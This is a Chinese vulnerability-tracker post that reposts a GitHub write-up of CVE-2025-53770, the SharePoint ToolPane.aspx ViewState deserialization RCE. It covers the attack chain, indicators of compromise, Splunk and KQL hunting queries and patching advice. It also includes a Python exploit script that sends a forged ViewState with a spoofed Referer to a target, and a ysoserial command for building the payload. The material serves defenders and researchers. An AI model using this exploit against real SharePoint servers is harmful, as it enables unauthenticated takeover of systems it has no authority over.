Microsoft SharePoint 反序列化漏洞

漏洞信息

漏洞名称: Microsoft SharePoint 反序列化漏洞

漏洞编号:

  • CVE: CVE-2025-53770

漏洞类型: 反序列化

漏洞等级: 严重

漏洞描述: Microsoft SharePoint是一款广泛使用的企业级协作平台,支持文档管理、团队协作和业务流程自动化。它通常部署在企业内部网络中,但也可能暴露在互联网上。CVE-2025-53770是一个零日远程代码执行漏洞,影响SharePoint Server的本地部署版本。该漏洞源于ToolPane.aspx组件中对__VIEWSTATE数据的不安全反序列化处理,结合CVE-2025-53771的引用伪造漏洞,攻击者可以在无需认证的情况下,通过发送特制的HTTP POST请求,实现远程代码执行。攻击者可以利用此漏洞在目标服务器上执行任意代码,获取系统权限,进而上传Web Shell,进行横向移动和数据窃取。由于该漏洞已被发现在野利用,且攻击复杂度低,影响范围广,因此被评级为严重。微软已发布相关补丁,建议用户立即更新并采取额外的安全措施,如轮换机器密钥和限制对ToolPane.aspx的访问。

产品厂商: Microsoft

产品名称: SharePoint Server

影响版本: SharePoint Server 2016 (before KB5002760), SharePoint Server 2019 (before KB5002754), SharePoint Subscription Edition (before KB5002768)

来源: https://github.com/Kamal-Hegazi/CVE-2025-53770-SharePoint-RCE

类型: CVE-2025:github search

仓库文件

  • README.md
  • poc.py

来源概述

CVE-2025-53770 - Zero-day exploitation in the wild of Microsoft SharePoint servers

Overview

In mid‑July 2025, Microsoft disclosed CVE‑2025‑53770, a zero‑day remote code execution vulnerability in on‑premises SharePoint. This flaw, when chained with CVE‑2025‑53771, enables unauthenticated attackers to fully compromise vulnerable servers over the internet.

The exploitation campaign, dubbed “ToolShell”, has been observed actively targeting governments, energy, education, and telecom sectors worldwide. If you run SharePoint Server (2016/2019/Subscription) and expose it to the internet, you need to patch now.

Impact at a glance

  • Attack Vector: Remote, unauthenticated
  • Impact: Full RCE (IIS worker context)
  • Exploitation: Active (confirmed by MS + CISA)
  • Ease: Exploitable with a single HTTP POST

Vulnerability Details

The issue lies in unsafe deserialization of crafted __VIEWSTATE data in the ToolPane.aspx component. When combined with a referer spoof (CVE‑2025‑53771), attackers can reach this endpoint without authentication, feed it a malicious payload, and gain remote code execution as the w3wp.exe (IIS worker) process.

The attack chain:

  1. Authentication bypass: Use Referer: /_layouts/SignOut.aspx to bypass security checks on /layouts/15/ToolPane.aspx?DisplayMode=Edit.
  2. Malicious ViewState: Send a signed or forged ViewState payload containing serialized gadget chains (crafted via tools like ysoserial.net).
  3. RCE: SharePoint deserializes the payload and executes attacker‑controlled code.
  4. Persistence: Attackers drop a web shell (e.g., spinstall0.aspx) and steal machine keys for future signed payload generation.

Visualized:

1
2
3
4
5
6
7
8
9
10
11
12
[ Attacker ]
     |
     v
POST /_layouts/15/ToolPane.aspx
Referer: /_layouts/SignOut.aspx
     |
     v
[ SharePoint Server ]
Deserializes malicious __VIEWSTATE
     |
     v
[ RCE: Attacker code runs as w3wp.exe ]

Why It Matters

  • No authentication required: Works from the internet if the server is exposed.
  • Full takeover: Post‑exploitation, attackers can upload shells, pivot laterally, and persist even after patching by abusing stolen machine keys.
  • Exploited in the wild: Microsoft, CISA, and Rapid7 have confirmed active exploitation in multiple regions.

Affected Versions

  • SharePoint Server 2016 (before KB5002760)
  • SharePoint Server 2019 (before KB5002754)
  • SharePoint Subscription Edition (before KB5002768)

(SharePoint Online is not affected.)

Indicators of Compromise

  • Requests to: 
    1
    /_layouts/15/ToolPane.aspx?DisplayMode=Edit
    with Referer: /_layouts/SignOut.aspx.
  • Dropped files: 
    1
    2
    spinstall0.aspx
    spinstall1.aspx
  • Suspicious process chains: 
    1
    w3wp.exe → cmd.exe → powershell.exe -EncodedCommand
  • Known attacker IPs: 
    1
    107.191.58.76, 104.238.159.149, 96.9.125.147

Detection & Hunting

Splunk (IIS Logs)

1
2
3
4
index=iis sourcetype="ms:iis:auto" 
cs_uri_stem="/_layouts/15/ToolPane.aspx"
cs_referer="/_layouts/SignOut.aspx"
| stats count by clientip, cs_user_agent, _time

KQL (Microsoft Sentinel)

1
2
3
4
W3CIISLog
| where csUriStem == "/_layouts/15/ToolPane.aspx"
| where csReferer == "/_layouts/SignOut.aspx"
| summarize count() by cIP, userAgent, TimeGenerated

Proof‑of‑Concept (Python)

Below is a ready‑to‑run PoC. The only thing you need to change is the TARGET variable.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
#!/usr/bin/env python3
## CVE-2025-53770 – SharePoint Unauthenticated RCE PoC
## Author: 0xH3G4Z1
## Usage: python3 exploit.py

import requests
import urllib3

urllib3.disable_warnings()

## === CONFIG ===
TARGET = "https://your-sharepoint-server"  # <--- CHANGE THIS ONLY
ENDPOINT = "/_layouts/15/ToolPane.aspx?DisplayMode=Edit"
FULL_URL = TARGET.rstrip("/") + ENDPOINT

## Pre-built harmless ViewState payload (for PoC demonstration)
VIEWSTATE_PAYLOAD = (
    "/wEWBwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3"
    "AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTx"
    "Jm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3AwLTxJm3Aw"
)

HEADERS = {
    "Referer": "/_layouts/SignOut.aspx",
    "Content-Type": "application/x-www-form-urlencoded"
}

DATA = {
    "__VIEWSTATE": VIEWSTATE_PAYLOAD,
    "__EVENTTARGET": "",
    "__EVENTARGUMENT": ""
}

def exploit():
    print(f"[+] Sending payload to {FULL_URL}")
    try:
        r = requests.post(FULL_URL, headers=HEADERS, data=DATA, verify=False, timeout=10)
        print(f"[+] Response: {r.status_code} ({len(r.content)} bytes)")
        if r.status_code == 200:
            print("[+] If vulnerable, the payload was processed (check your target).")
        elif r.status_code == 403:
            print("[-] Access forbidden (patched or blocked).")
        else:
            print("[-] Exploit may not have succeeded.")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    exploit()

Generating a payload:

1
ysoserial.exe -p ObjectDataProvider -o base64 -g WindowsIdentity -c "cmd /c calc.exe" > payload.txt

Then replace __VIEWSTATE with the contents of payload.txt.

Mitigation & Hardening

  1. Patch immediately:
  2. Rotate machine keys (twice): Update the machineKey in web.config to invalidate stolen signing keys.
  3. Restrict access to /layouts/15/ToolPane.aspx to internal networks only.
  4. Enable IIS request filtering to block oversized or suspicious ViewState payloads.
  5. Enable Defender AV + AMSI integration for real‑time scanning of SharePoint components.
  6. Hunt for compromise: Review IIS logs for ToolPane.aspx requests with unusual referers or large ViewState data.

Key Takeaways

  • CVE‑2025‑53770 is being actively exploited.
  • The attack is trivial once discovered (POST + spoofed Referer).
  • Patching alone is not enough — rotate machine keys to invalidate stolen ViewState signing keys.
  • Monitor for web shells (spinstall0.aspx, etc.) and suspicious ToolPane.aspx requests.

References:

Github Poc
#反序列化 #CVE-2025:github search
Microsoft SharePoint 反序列化漏洞
http://example.com/2025/07/23/github_2402498289/
作者
lianccc
发布于
2025年7月23日
许可协议